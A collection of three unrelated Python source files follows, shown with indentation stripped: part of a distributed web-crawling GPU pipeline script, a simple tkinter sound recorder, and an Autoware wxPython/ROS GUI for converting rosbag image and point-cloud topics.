incbar = tqdm(total=int(nodes), desc="Inbound pipeline", position=1, bar_format='{desc}: {n_fmt}/{total_fmt} ({percentage:0.0f}%) ')
outbar = tqdm(total=int(nodes), desc="Outbound pipeline", position=0, bar_format='{desc}: {n_fmt}/{total_fmt} ({percentage:0.0f}%) ')
# keep main process for monitoring
while True:
incbar.n = inbound.qsize()
outbar.n = outbound.qsize()
if inpsize.qsize() > 0:
incbar.desc = Fore.GREEN + incbar.desc.strip(Fore.RED).strip(Fore.GREEN).strip(Fore.RESET) + Fore.RESET
else:
incbar.desc = Fore.RED + incbar.desc.strip(Fore.RED).strip(Fore.GREEN).strip(Fore.RESET) + Fore.RESET
if inbound.qsize()>0:
probar.desc = Fore.GREEN + probar.desc.strip(Fore.RED).strip(Fore.GREEN).strip(Fore.RESET) + Fore.RESET
else:
probar.desc = Fore.RED + probar.desc.strip(Fore.RED).strip(Fore.GREEN).strip(Fore.RESET) + Fore.RESET
if outbound.qsize()>0:
outbar.desc = Fore.GREEN + outbar.desc.strip(Fore.RED).strip(Fore.GREEN).strip(Fore.RESET) + Fore.RESET
else:
outbar.desc = Fore.RED + outbar.desc.strip(Fore.RED).strip(Fore.GREEN).strip(Fore.RESET) + Fore.RESET
incbar.refresh()
outbar.refresh()
probar.refresh()
while counter.qsize() > 0:
counter.get()
probar.update(1)
counter.task_done()
time.sleep(1)
def monitor2(nodes, inbound, outbound, counter, inpsize, stdscr, errors, gpuflag):
gpujobsdone = 0
start = time.time()
curses.curs_set(0)
curses.start_color()
curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK)
# do stuff
while True:
stdscr.clear()
while counter.qsize() > 0:
counter.get()
gpujobsdone += 1
counter.task_done()
if inpsize.qsize() > 0:
stdscr.addstr(0,0,"Downloading..", curses.A_BLINK + curses.color_pair(1))
else:
stdscr.addstr(0,0,"----------- ")
stdscr.addstr(0,13,f"Incoming pipeline ({inbound.qsize()}/{nodes})")
if outbound.qsize()>0:
stdscr.addstr(1,0,"Uploading..",curses.A_BLINK + curses.color_pair(1))
else:
stdscr.addstr(1,0,"----------- ")
stdscr.addstr(1,13,f"Outgoing pipeline ({outbound.qsize()}/{nodes})")
if gpuflag.qsize()>0:
stdscr.addstr(2,0,"Processing..", curses.A_BLINK + curses.color_pair(1))
else:
stdscr.addstr(2,0,"----------- ")
stdscr.addstr(2,13,f"GPU jobs done: {gpujobsdone}")
stdscr.addstr(3,0,f"GPU velocity: {round(60*(gpujobsdone/(time.time()-start)), 2)} jobs/m")
if errors.qsize() > 0:
msg = errors.get()
errors.task_done()
stdscr.addstr(5,0,f"messages: {msg} ")
stdscr.refresh()
time.sleep(1)
#stdscr.getkey()
if __name__ == "__main__":
YOUR_NICKNAME_FOR_THE_LEADERBOARD = os.getenv('CAH_NICKNAME')
if YOUR_NICKNAME_FOR_THE_LEADERBOARD is None:
YOUR_NICKNAME_FOR_THE_LEADERBOARD = "anonymous"
CRAWLINGATHOME_SERVER_URL = "http://cah.io.community/"
print(
f"[GPU] starting session under `{YOUR_NICKNAME_FOR_THE_LEADERBOARD}` nickname")
nodes = sys.argv[1]
location = None
skip = None
local = True
concat = 16 # how many shards to group for CLIP
if len(sys.argv) > 2:
location = sys.argv[2]
if len(sys.argv) > 3:
skip = sys.argv[3]
workers = []
if skip is None:
try:
start = time.time()
# generate cloud workers
workers = trio.run(infrastructure.up, nodes, location)
with open("workers.txt", "w") as f:
for ip in workers:
f.write(ip + "\n")
trio.run(infrastructure.wait_for_infrastructure, workers)
print(
f"[swarm] {len(workers)} nodes cloud swarm is up and was initialized in {round(time.time() - start)}s")
except KeyboardInterrupt:
print(f"[swarm] Abort! Deleting cloud swarm...")
trio.run(infrastructure.down)
print(f"[swarm] Cloud swarm was shutdown")
sys.exit()
except Exception as e:
print(f"[swarm] Error, could not bring up swarm... please consider shutting down all workers via `python3 infrastructure.py down`")
print(e)
sys.exit()
else:
with open("workers.txt", "r") as f:
for line in f.readlines():
workers.append(line.strip("\n"))
try:
# initial cleanup - delete all working files in case of crash recovery
reg_compile = re.compile(r"^\d{1,3}-\d{1,3}-\d{1,3}-\d{1,3}$")
for root, dirnames, filenames in os.walk("."):
for filename in filenames:
if filename.startswith("gpujob.zip_"):
os.remove(filename)
for dir in dirnames:
if reg_compile.match(dir):
shutil.rmtree(dir)
#initialize 3 joinable queues to transfer messages between multiprocess processes
inbound = JoinableQueue()
outbound = JoinableQueue()
counter = JoinableQueue()
inpsize = JoinableQueue() # use this to communicate number of jobs downloading now
gpuflag = JoinableQueue() # use this to flag that gpu is processing
errors = JoinableQueue() # use this to capture errors and warnings and route them to curses display
# launch separate processes with specialized workers
inb = Process(target=incoming_worker, args=[workers, inbound, inpsize, errors], daemon=True).start()
time.sleep(5)
otb = Process(target=outgoing_worker, args=[outbound, errors, local], daemon=True).start()
time.sleep(5)
monitor = Process(target=monitor, args=[nodes, inbound, outbound, counter, inpsize]).start()
#curses.wrapper(monitor2(nodes, inbound, outbound, counter, inpsize, stdscr, errors, gpuflag))
gpu_worker(inbound, outbound, counter, errors, gpuflag, concat)
except KeyboardInterrupt:
#curses.nocbreak()
#curses.echo()
#curses.endwin()
print(f"[GPU] Abort! Deleting cloud infrastructure...")
letters = string.ascii_lowercase
suffix = ''.join(random.choice(letters) for i in range(3))
pclient = ParallelSSHClient(workers, user='crawl', pkey="~/.ssh/id_cah", identity_auth=False )
pclient.scp_recv('/home/crawl/crawl.log', suffix + '_crawl.log')
trio.run(infrastructure.down)
print(f"[infrastructure] Cloud infrastructure was shutdown")
sys.exit()
except Exception as e:
print (f"general exception: {e}")
sys.exit()
|
26_sound_recorder.py
|
import tkinter as tk
import threading
import pyaudio
import wave
class App():
chunk = 1024
sample_format = pyaudio.paInt16
channels = 2
fs = 44100
frames = []
def __init__(self, master):
self.isrecording = False
self.button1 = tk.Button(main, text='rec',command=self.startrecording)
self.button2 = tk.Button(main, text='stop',command=self.stoprecording)
self.button1.focus()
self.button1.pack()
self.button2.pack()
def startrecording(self):
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=self.sample_format,channels=self.channels,rate=self.fs,frames_per_buffer=self.chunk,input=True)
self.isrecording = True
print('Recording')
self.button2.focus()
t = threading.Thread(target=self.record)
t.start()
def stoprecording(self):
self.isrecording = False
self.variable = tk.StringVar()
self.name = tk.Entry(main, textvariable = self.variable,bg = "pink",width = 15)
self.name.focus()
self.name.pack()
print('recording complete')
self.button3 = tk.Button(main, text='SAVE',command=self.file_name)
self.button3.pack()
self.button3.focus()
def file_name(self):
self.filename=self.variable.get()
self.filename = self.filename+".wav"
wf = wave.open(self.filename, 'wb')
wf.setnchannels(self.channels)
wf.setsampwidth(self.p.get_sample_size(self.sample_format))
wf.setframerate(self.fs)
wf.writeframes(b''.join(self.frames))
wf.close()
main.destroy()
def record(self):
while self.isrecording:
data = self.stream.read(self.chunk)
self.frames.append(data)
main = tk.Tk()
main.title('Sound Recorder')
main.geometry('200x100')
app = App(main)
main.mainloop()
|
data_preprocessor.py
|
#!/usr/bin/env python
import wx
import wx.lib.buttons
import wx.lib.agw.customtreectrl as CT
import gettext
import os
import re
import sys
import fcntl
import threading
import Queue
import time
import socket
import struct
import shlex
import signal
import subprocess
import psutil
import pty
import yaml
import datetime
import syslog
from insidedesign import InsideDesign
import rtmgr
import rospy
import std_msgs.msg
from std_msgs.msg import Bool
from decimal import Decimal
from get_rosbaginfo import get_type_and_topic
SCHED_OTHER = 0
SCHED_FIFO = 1
SCHED_RR = 2
PROC_MANAGER_SOCK="/tmp/autoware_proc_manager"
class Final(InsideDesign):
def __init__(self, *args, **kwds):
super(Final, self).__init__(*args, **kwds)
self.all_procs = []
self.all_cmd_dics = []
self.all_procs = []
self.all_cmd_dics = []
self.load_dic = self.load_yaml('param.yaml', def_ret={})
self.config_dic = {}
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.params = []
self.all_tabs = []
self.all_th_infs = []
self.log_que = Queue.Queue()
self.log_que_stdout = Queue.Queue()
self.log_que_stderr = Queue.Queue()
self.log_que_show = Queue.Queue()
#####################################
## ros
#####################################
rospy.init_node('runime_manager', anonymous=True)
rospy.Subscriber('to_rtmgr', std_msgs.msg.String, self.ROSCb)
self.pub = rospy.Publisher('from_rtmgr', std_msgs.msg.String, queue_size=10)
#######################################
# for Select Topic & Excecution Tab
#######################################
self.label_rosbag_play_bar.Destroy()
self.label_rosbag_play_bar = BarLabel(self.tab_select, ' Playing... ')
self.label_rosbag_play_bar.Enable(False)
self.label_rosbag_play_bar2.Destroy()
self.label_rosbag_play_bar2 = BarLabel(self.tab_depth, ' Playing... ')
self.label_rosbag_play_bar2.Enable(False)
self.play = 0
self.file_path = ""
self.select = 0
self.topic_type = None
tab = self.tab_simulation
self.all_tabs.append(tab)
self.simulation_cmd = {}
self.all_cmd_dics.append(self.simulation_cmd)
dic = self.load_yaml('tab_input.yaml')
self.add_params(dic.get('params', []))
self.setup_buttons(dic.get('buttons'), self.simulation_cmd)
self.proc = 0
self.output_url = ""
self.calib_url = ""
self.depth_flag = False
self.selected_img = {}
self.selected_pcd = {}
self.image_for_depth = None
self.pointcloud_for_depth = None
self.objx = False
self.velodyne_button = False
#
# self.depth_cmd = {}
# self.all_cmd_dics.append(self.depth_cmd)
# dic = self.load_yaml('tab_depth.yaml')
# self.add_params(dic.get('params', []))
# self.setup_buttons(dic.get('buttons'), self.depth_cmd)
btn = self.button_play_rosbag_play
# setup for rosbag info
gdic = self.obj_to_gdic(btn, {})
gdic_v = dic_getset(gdic, 'file', {})
gdic_v['update_hook'] = self.rosbag_info_hook
tc = self.obj_to_varpanel_tc(btn, 'file')
if tc:
self.rosbag_info_hook( tc.GetValue() )
else:
print("Please Set Bag File")
self.topic_and_type_list = None
self.select_topic_delete_dic = {0:[], 1:[]}
self.selected_topic_dic = {}
self.select_created_topic = {}
self.selected_topic_dic2 = {}
self.runtime_dic = self.load_yaml('runtime.yaml')
self.cmd_dic = {}
try:
self._do_layout()
except Exception as e:
print(e)
cond = lambda s : s.startswith('tab_')
self.tab_names = [ self.name_get_cond(tab, cond=cond, def_ret='').replace('tab_', '', 1) for tab in self.all_tabs ]
#
new_btn_grps = ( lambda btn_names, tab_names=self.tab_names :
[ [ self.obj_get('button_{}_{}'.format(bn, tn)) for tn in tab_names ] for bn in btn_names ] )
self.alias_grps = new_btn_grps( ('rosbag', 'rviz', 'rqt') )
# ################################
# ## For CPU Bar
# ################################
# toprc = os.path.expanduser('~/.toprc')
# backup = os.path.expanduser('~/.toprc-autoware-backup')
# self.toprc_setup(toprc, backup)
#
# cpu_ibls = [ InfoBarLabel(self, 'CPU'+str(i)) for i in range(get_cpu_count()) ]
# sz = sizer_wrap(cpu_ibls, wx.HORIZONTAL, 1, wx.EXPAND, 0)
# self.sizer_cpuinfo.Add(sz, 8, wx.ALL | wx.EXPAND, 4)
#
#
# self.lb_top5 = []
# for i in range(5):
# lb = wx.StaticText(self, wx.ID_ANY, '')
# change_font_point_by_rate(lb, 0.75)
# self.lb_top5.append(lb)
# line = wx.StaticLine(self, wx.ID_ANY)
# ibl = InfoBarLabel(self, 'Memory', bar_orient=wx.HORIZONTAL)
# szr = sizer_wrap(self.lb_top5 + [ line, ibl ], flag=wx.EXPAND | wx.FIXED_MINSIZE)
# self.sizer_cpuinfo.Add(szr, 2, wx.ALL | wx.EXPAND, 4)
#
# self.status_dic = self.load_yaml('status.yaml')
#
# th_arg = { 'setting':self.status_dic.get('top_cmd_setting', {}),
# 'cpu_ibls':cpu_ibls, 'mem_ibl':ibl,
# 'toprc':toprc, 'backup':backup }
#
# thinf = th_start(self.top_cmd_th, th_arg)
# self.all_th_infs.append(thinf)
#
# font = wx.Font(10, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
# self.label_top_cmd.SetFont(font)
# icon
bm = scaled_bitmap(wx.Bitmap(rtmgr_src_dir() + 'autoware_logo_2_white.png'), 0.5)
icon = wx.EmptyIcon()
icon.CopyFromBitmap(bm)
self.SetIcon(icon)
def OnRviz(self, event):
push = event.GetEventObject()
cmd = None
if push.GetValue():
self.selected_topic_dic[push] = "RViz"
cmd = "rosrun rviz rviz -f velodyne"
self.cmd_dic[push] = (cmd, None)
self.launch_kill_proc2(push, self.cmd_dic)
else:
self.launch_kill_proc2(push, self.cmd_dic)
val = self.selected_topic_dic.pop(push)
print("Kill '%s'" % self.cmd_dic[push][0])
push.SetBackgroundColour(wx.NullColour)
def OnROSbagPlay2(self, event):
push = event.GetEventObject()
btn = self.button_play_rosbag_play
tc = self.obj_to_varpanel_tc(btn, 'file')
if tc.GetValue():
if push == self.button_play_rosbag_play2:
f = "self.rosbag_play_progress_bar2"
f = eval_if_str(self, f)
f = f if f else self.log_th
out = subprocess.PIPE if f else None
err = subprocess.STDOUT if f else None
args = ['rosbag', 'play', '--clock', tc.GetValue()]
proc = psutil.Popen(args, stdin=subprocess.PIPE, stdout=out, stderr=err)
self.all_procs.append(proc)
self.proc = proc
thinf = th_start(f, {'file':proc.stdout})
self.push = push
self.button_pause_rosbag_play2.Enable()
self.button_stop_rosbag_play2.Enable()
self.button_play_rosbag_play2.Disable()
self.button_play_rosbag_play.Disable()
self.button_play_rosbag_play2.SetBackgroundColour("#E0E0F0")
self.button_stop_rosbag_play2.SetBackgroundColour(wx.NullColour)
self.button_stop_rosbag_play2.SetForegroundColour(wx.NullColour)
self.button_pause_rosbag_play2.SetForegroundColour(wx.NullColour)
self.button_stop_rosbag_play2.SetValue(0)
self.button_pause_rosbag_play2.SetValue(0)
self.button_confirm_topics.Disable()
self.button_confirm_depth.Disable()
elif push == self.button_pause_rosbag_play2:
if self.proc:
self.proc.stdin.write(' ')
self.button_stop_rosbag_play2.Enable()
self.button_pause_rosbag_play2.Enable()
elif push == self.button_stop_rosbag_play2:
# self.proc = self.launch_kill_proc2(self.button_play_rosbag_play2, self.cmd_dic)
self.button_play_rosbag_play2.Enable()
# self.button_play_rosbag_play2.SetCo
self.button_play_rosbag_play.Enable()
self.button_stop_rosbag_play2.Disable()
self.button_pause_rosbag_play2.Disable()
self.button_play_rosbag_play2.SetValue(0)
self.button_stop_rosbag_play2.SetValue(0)
self.button_pause_rosbag_play2.SetValue(0)
self.button_confirm_depth.Enable()
self.button_confirm_topics.Enable()
dic = { (True,True):('#F9F9F8','#8B8BB9'), (True,False):('#F9F9F8','#E0E0F0') }
self.button_play_rosbag_play2.SetBackgroundColour(wx.NullColour)
self.button_stop_rosbag_play2.SetBackgroundColour("#E0E0F0")
self.button_pause_rosbag_play2.SetBackgroundColour(wx.NullColour)
self.button_play_rosbag_play2.SetForegroundColour(wx.NullColour)
sigint = 'SIGTERM'
if True:
terminate_children(self.proc, sigint)
terminate(self.proc, sigint)
self.proc.wait()
# del self.cmd_dic[self.button_play_rosbag_play2]
if self.proc in self.all_procs:
self.all_procs.remove(self.proc)
else:
wx.MessageBox("Please Set Bag File")
def rosbag_play_progress_bar2(self, file, ev):
while not ev.wait(0):
s = self.stdout_file_search(file, 'Duration:')
if not s:
break
lst = s.split()
pos = str_to_float(lst[0])
# lst[1] is '/'
total = str_to_float(lst[2])
if total == 0:
continue
prg = int(100 * pos / total + 0.5)
pos = str(int(pos))
total = str(int(total))
wx.CallAfter(self.label_rosbag_play_bar2.set, prg)
wx.CallAfter(self.label_rosbag_play_pos2.SetLabel, pos)
wx.CallAfter(self.label_rosbag_play_total2.SetLabel, total)
wx.CallAfter(self.label_rosbag_play_bar2.clear)
wx.CallAfter(self.label_rosbag_play_pos2.SetLabel, '')
wx.CallAfter(self.label_rosbag_play_total2.SetLabel, '')
def stdout_file_search(self, file, k):
s = ''
while True:
c = file.read(1)
if not c:
return None
if c != '\r' and c != '\n':
s += c
continue
s = s.strip()
if k in s:
break
s = ''
i = s.find(k) + len(k)
return s[i:]
def OnConvertCheckedTopic(self, event):
push = event.GetEventObject()
cmd = None
if push.GetValue():
topic_output_info = self.select_created_topic[push]
topic_var_name = topic_output_info['name']
topic_var_panel = getattr(self, "button_" + topic_var_name)
topic_path_obj = self.obj_to_varpanel_tc(topic_var_panel, 'file')
topic_path = topic_path_obj.GetValue()
topic_output_info['path'] = topic_path
if topic_path and topic_path != 'Please Set Output Directory':
self.select_created_topic[push] = topic_output_info
if not os.path.exists(topic_path):
subprocess.call(['mkdir', '-p', topic_path])
self.selected_topic_dic[push] = topic_output_info
topic_type = topic_output_info['topic_type']
if topic_type == 'sensor_msgs/Image':
cmd = "rosrun data_preprocessor get_Image %s %s" % (topic_path, topic_output_info['topic'])
# file_format = topic_output_info['topic'][1:].replace('/', '_') + "_%08d.%s"
# cmd = "rosrun image_view image_saver image:=%s _filename_format:=%s" % (topic_output_info['topic'], file_format)
self.cmd_dic[push] = (cmd, None)
self.launch_kill_proc2(push, self.cmd_dic)
if topic_type == 'sensor_msgs/PointCloud2':
cmd = "rosrun data_preprocessor get_PCD %s %s" % (topic_path, topic_output_info['topic'])
self.cmd_dic[push] = (cmd, None)
self.launch_kill_proc2(push, self.cmd_dic)
print("launch '%s'" % self.cmd_dic[push][0])
else:
push.SetValue(0)
wx.MessageBox("Please Set Output Directory")
else:
self.launch_kill_proc2(push, self.cmd_dic)
val = self.selected_topic_dic.pop(push)
print("Kill '%s'" % self.cmd_dic[push][0])
def OnSelectPointCheckbox(self, event):
push = event.GetEventObject()
if push.GetValue():
if self.selected_pcd != {}:
for k in self.selected_pcd.keys():
if k != push:
k.SetValue(0)
self.pointcloud_for_depth = self.select_created_topic[push]
self.selected_pcd[push] = self.pointcloud_for_depth
else:
push.SetValue(0)
del self.selected_pcd[push]
self.pointcloud_for_depth = None
def OnSelectImageCheckbox(self, event):
push = event.GetEventObject()
if push.GetValue():
if self.selected_img != {}:
for k in self.selected_img.keys():
if k != push:
k.SetValue(0)
self.image_for_depth = self.select_created_topic[push]
self.selected_img[push] = self.image_for_depth
else:
push.SetValue(0)
del self.selected_img[push]
self.image_for_depth = None
def OnGetConfirmTopics(self, event):
if self.depth_flag:
self.button_confirm_depth.SetValue(0)
self.button_confirm_depth.SetBackgroundColour(wx.NullColour)
self.button_confirm_depth.SetForegroundColour(wx.NullColour)
self.launch_kill_proc2(self.button_confirm_depth, self.cmd_dic)
if self.objx:
if self.objx.GetValue():
self.objx.SetValue(0)
self.launch_kill_proc2(self.objx, self.cmd_dic, is_rapid_delete=True)
val = self.selected_topic_dic.pop(self.objx)
print("Kill '%s'" % self.cmd_dic[self.objx][0])
self.objx.SetValue(0)
self.points_raw_save.Disable()
self.points_raw_depth.Disable()
self.file_url.Disable()
if self.velodyne_button:
if self.velodyne_button.GetValue():
self.velodyne_button.SetValue(0)
self.launch_kill_proc2(self.velodyne_button, self.cmd_dic, is_rapid_delete=True)
val = self.selected_topic_dic.pop(self.velodyne_button)
print("Kill '%s'" % self.cmd_dic[self.velodyne_button][0])
self.velodyne_button.SetValue(0)
self.points_raw_save.Disable()
self.points_raw_depth.Disable()
self.file_url.Disable()
self.button_confirm_depth.Enable()
self.get_confirm_topic_list()
def get_confirm_topic_list(self):
self.get_all_topics()
self.get_depth_topic()
def OnConvertVelodyne(self, event):
push = event.GetEventObject()
cmd = None
dic = {
1:"velodyne_hdl64e_s2.launch",
2: "velodyne_hdl64e_s3.launch",
3: "velodyne_hdl32e.launch",
4: "velodyne_vlp16.launch",
5: "top_urg.launch",
6: "hokuyo_3d.launch"
}
if push.GetValue():
if ((self.file_path) and (self.select)):
self.selected_topic_dic[push] = dic[self.select]
if not((self.select == 5) or (self.select == 6)):
# cmd = "roslaunch velodyne_pointcloud 32e_points.launch"
cmd = "roslaunch" + " data_preprocessor " + dic[self.select] + " calibration:=%s" %self.file_path
else:
cmd = "roslaunch" + " data_preprocessor " + dic[self.select]
self.cmd_dic[push] = (cmd, None)
self.launch_kill_proc2(push, self.cmd_dic)
if push == self.objx:
self.points_raw_save.Enable()
self.file_url.Enable()
if push == self.velodyne_button:
self.points_raw_depth.Enable()
# if push != self.velodyne_button:
# self.file_url.Enable()
print("launch '%s'" % self.cmd_dic[push][0])
else:
push.SetValue(0)
wx.MessageBox("Please Choose Lidar")
else:
self.launch_kill_proc2(push, self.cmd_dic, is_rapid_delete=True)
val = self.selected_topic_dic.pop(push)
print("Kill '%s'" % self.cmd_dic[push][0])
push.SetValue(0)
if push == self.objx:
if self.points_raw_save.GetValue():
self.launch_kill_proc2(self.points_raw_save, self.cmd_dic)
val = self.selected_topic_dic.pop(self.points_raw_save)
print("Kill '%s'" % self.cmd_dic[self.points_raw_save][0])
self.points_raw_save.SetValue(0)
self.points_raw_save.Disable()
self.points_raw_depth.Disable()
# self.points_raw.Disable()
self.file_url.Disable()
def OnGetLidar(self, event):
dialog = DetailDialog(self)
try:
dialog.ShowModal()
finally:
dialog.Destroy()
if ((self.file_path) and (self.select)):
self.objx.Enable()
else:
self.objx.Disable()
# self.points_raw.Disable()
self.points_raw_depth.Disable()
self.points_raw_save.Disable()
self.file_url.Disable()
def OnGetDepthLidar(self, event):
dialog = DetailDialog(self)
try:
dialog.ShowModal()
finally:
dialog.Destroy()
if ((self.file_path) and (self.select)):
self.velodyne_button.Enable()
else:
self.velodyne_button.Disable()
self.points_raw_save.Disable()
self.points_raw_depth.Disable()
self.file_url.Disable()
def get_bag_url(self):
btn = self.button_play_rosbag_play
tc = self.obj_to_varpanel_tc(btn, 'file')
return tc.GetValue()
def create_url_panel(self, sss, index, topic, topic_type, obj, strings, file_type="dir", comment='Please Set Output Directory'):
button_input_name = "button_input" + str(index)
button_input_var_name = "button_input_var" + str(index)
dic = {
'buttons' : {button_input_name: {'gui': {'panel': strings},'param': button_input_var_name}},
'params' : [
{
'no_save_vars' : ['file'],
'name': button_input_var_name,
'vars': [{'kind': 'path', 'name': 'file', 'path_type' : file_type, 'v': comment}]
}]}
self.add_params(dic.get('params', []))
#################
## set URL & param bar
#################
self.setup_buttons(dic.get('buttons'), self.simulation_cmd)
button_var = getattr(self, "button_" + button_input_name)
file_url = self.obj_to_varpanel_tc(button_var, 'file')
if self.topic_type == "velodyne_msgs/VelodyneScan":
self.file_url = file_url
self.file_url.Disable()
if file_url:
topic_info = {}
topic_info['path'] = file_url.GetValue()
topic_info['topic'] = topic
topic_info['topic_type'] = topic_type
topic_info['name'] = button_input_name
self.select_created_topic[obj] = topic_info
def get_all_topic(self):
bag_url = self.get_bag_url()
self.select_created_topic = {}
if bag_url:
self.topic_and_type_list = get_type_and_topic(bag_url)
szr = self.sizer_select_topics
sss = self.select_scroll
sssb = self.sizer_select_box
if self.selected_topic_dic:
self.delete_launch()
self.delete_topic_panel(szr, num=0)
topic_conversion_dic = {
'sensor_msgs/Image' : "RGB Image",
'sensor_msgs/PointCloud2' : "PCD",
'velodyne_msgs/VelodyneScan' : "sensor_msgs/PointCloud2"
}
for i, (topic_type, topic) in enumerate(self.topic_and_type_list):
if topic_type in topic_conversion_dic.keys():
select_topic_staticbox = wx.StaticBox(sss, wx.ID_ANY, "")
select_topic_staticbox.Lower()
sizer_select_topic = wx.StaticBoxSizer(select_topic_staticbox, wx.VERTICAL)
panelx = None
if topic_type == "velodyne_msgs/VelodyneScan":
panelx = wx.Panel(sss, wx.ID_ANY)
self.objx = wx.CheckBox(panelx, wx.ID_ANY, "Convert {0} To {1}".format("VelodyneScan", "PointCloud2"))
self.objx.SetValue(0)
self.objx.Disable()
self.objx.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnConvertVelodyne, self.objx)
self.buttonx = wx.ToggleButton(sss, wx.ID_ANY, _("Choose Lidar"))
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnGetLidar, self.buttonx)
upper_area = wx.BoxSizer( wx.HORIZONTAL)
upper_area.Add(panelx, 1, wx.ALL | wx.EXPAND, 4)
upper_area.Add(self.buttonx, 0, wx.ALL, 1)
sizer_select_topic.Add(upper_area)
topic = "/points_raw"
panel = wx.Panel(sss, wx.ID_ANY)
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
obj.SetValue(0)
if topic_type == "velodyne_msgs/VelodyneScan":
self.points_raw_save = obj
self.topic_type = topic_type
topic_type = "sensor_msgs/PointCloud2"
self.points_raw_save.Disable()
else:
self.topic_type = None
obj.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnConvertCheckedTopic, obj)
panel2 = wx.Panel(sss, wx.ID_ANY)
topic_sentence = "From {0} To {1}".format(topic_type, topic_conversion_dic[topic_type])
obj2 = wx.StaticText(panel2, wx.ID_ANY, topic_sentence)
#obj2.SetForegroundColour("#FF0000")
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj2.SetFont(font)
self.panel3 = wx.Panel(sss, wx.ID_ANY)
self.create_url_panel(sss, i, topic, topic_type, obj, "self.panel3")
up_area = wx.BoxSizer( wx.HORIZONTAL)
down_area = wx.BoxSizer(wx.HORIZONTAL)
up_area.Add(panel, 1, wx.ALL | wx.EXPAND, 4)
up_area.Add(panel2, 3, wx.TOP | wx.EXPAND | wx.LEFT, 6)
sizer_select_topic.Add(up_area)
down_area.Add(self.panel3, 1, wx.ALL | wx.EXPAND, 4)
sizer_select_topic.Add(down_area, 1, wx.EXPAND, 4)
szr.Add(sizer_select_topic, 0, wx.ALL | wx.EXPAND, 4)
self.select_topic_delete_dic[0].append(sizer_select_topic)
sss.SetSizer(szr)
# sssb.Add(sss, 0, wx.EXPAND, 0)
sss.Layout()
sssb.Layout()
else:
wx.MessageBox("Please Set Bag File")
def get_all_topics(self):
bag_url = self.get_bag_url()
self.select_created_topic = {}
self.topic_type = None
if bag_url:
self.topic_and_type_list = get_type_and_topic(bag_url)
szr = self.sizer_select_topics
sss = self.select_scroll
sssb = self.sizer_select_box
if self.selected_topic_dic:
self.delete_launch()
self.delete_topic_panel(szr, num=0)
topic_conversion_dic = {
'sensor_msgs/Image' : "RGB Image",
'sensor_msgs/PointCloud2' : "PCD",
'velodyne_msgs/VelodyneScan' : "sensor_msgs/PointCloud2"
}
sizer_image_topic = None
sizer_pointcloud_topic = None
for topic_type, topic in self.topic_and_type_list:
if topic_type == "sensor_msgs/Image":
if sizer_image_topic == None:
select_image_staticbox = wx.StaticBox(sss, wx.ID_ANY, "Image")
select_image_staticbox.Lower()
sizer_image_topic = wx.StaticBoxSizer(select_image_staticbox, wx.VERTICAL)
if topic_type in ["sensor_msgs/PointCloud2", 'velodyne_msgs/VelodyneScan']:
if sizer_pointcloud_topic == None:
select_pointcloud_staticbox = wx.StaticBox(sss, wx.ID_ANY, "PointCloud")
select_pointcloud_staticbox.Lower()
sizer_pointcloud_topic = wx.StaticBoxSizer(select_pointcloud_staticbox, wx.VERTICAL)
for i, (topic_type, topic) in enumerate(self.topic_and_type_list):
if topic_type == "sensor_msgs/Image":
panelx = None
panel = wx.Panel(sss, wx.ID_ANY)
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
obj.SetValue(0)
self.topic_type = None
obj.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnConvertCheckedTopic, obj)
panel2 = wx.Panel(sss, wx.ID_ANY)
topic_sentence = "From {0} To {1}".format(topic_type, topic_conversion_dic[topic_type])
obj2 = wx.StaticText(panel2, wx.ID_ANY, topic_sentence)
#obj2.SetForegroundColour("#FF0000")
font = wx.Font(13, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
obj2.SetFont(font)
self.panel3 = wx.Panel(sss, wx.ID_ANY)
self.create_url_panel(sss, i, topic, topic_type, obj, "self.panel3")
up_area = wx.BoxSizer( wx.HORIZONTAL)
down_area = wx.BoxSizer(wx.HORIZONTAL)
up_area.Add(panel, 1, wx.ALL | wx.EXPAND, 4)
up_area.Add(panel2, 3, wx.TOP | wx.EXPAND | wx.LEFT, 6)
sizer_image_topic.Add(up_area)
down_area.Add(self.panel3, 1, wx.ALL | wx.EXPAND, 4)
sizer_image_topic.Add(down_area, 1, wx.EXPAND, 4)
for i, (topic_type, topic) in enumerate(self.topic_and_type_list):
if topic_type in ["velodyne_msgs/VelodyneScan", "sensor_msgs/PointCloud2"]:
# if topic_type in topic_conversion_dic.keys():
panelx = None
if topic_type == "velodyne_msgs/VelodyneScan":
panelx = wx.Panel(sss, wx.ID_ANY)
self.objx = wx.CheckBox(panelx, wx.ID_ANY, "Convert {0} To {1}".format("VelodyneScan", "PointCloud2"))
self.objx.SetValue(0)
self.objx.Disable()
self.objx.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnConvertVelodyne, self.objx)
self.buttonx = wx.ToggleButton(sss, wx.ID_ANY, _("Choose Lidar"))
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnGetLidar, self.buttonx)
upper_area = wx.BoxSizer( wx.HORIZONTAL)
upper_area.Add(panelx, 1, wx.ALL | wx.EXPAND, 4)
upper_area.Add(self.buttonx, 0, wx.ALL, 1)
sizer_pointcloud_topic.Add(upper_area)
topic = "/points_raw"
panel = wx.Panel(sss, wx.ID_ANY)
obj = wx.CheckBox(panel, wx.ID_ANY, topic)
obj.SetValue(0)
if topic_type == "velodyne_msgs/VelodyneScan":
self.points_raw_save = obj
self.topic_type = topic_type
topic_type = "sensor_msgs/PointCloud2"
self.points_raw_save.Disable()
else:
self.topic_type = None
obj.SetForegroundColour("#FF0000")
self.Bind(wx.EVT_CHECKBOX, self.OnConvertCheckedTopic, obj)
panel2 = wx.Panel(sss, wx.ID_ANY)
topic_sentence = "From {0} To {1}".format(topic_type, topic_conversion_dic[topic_type])
obj2 = wx.StaticText(panel2, wx.ID_ANY, topic_sentence)
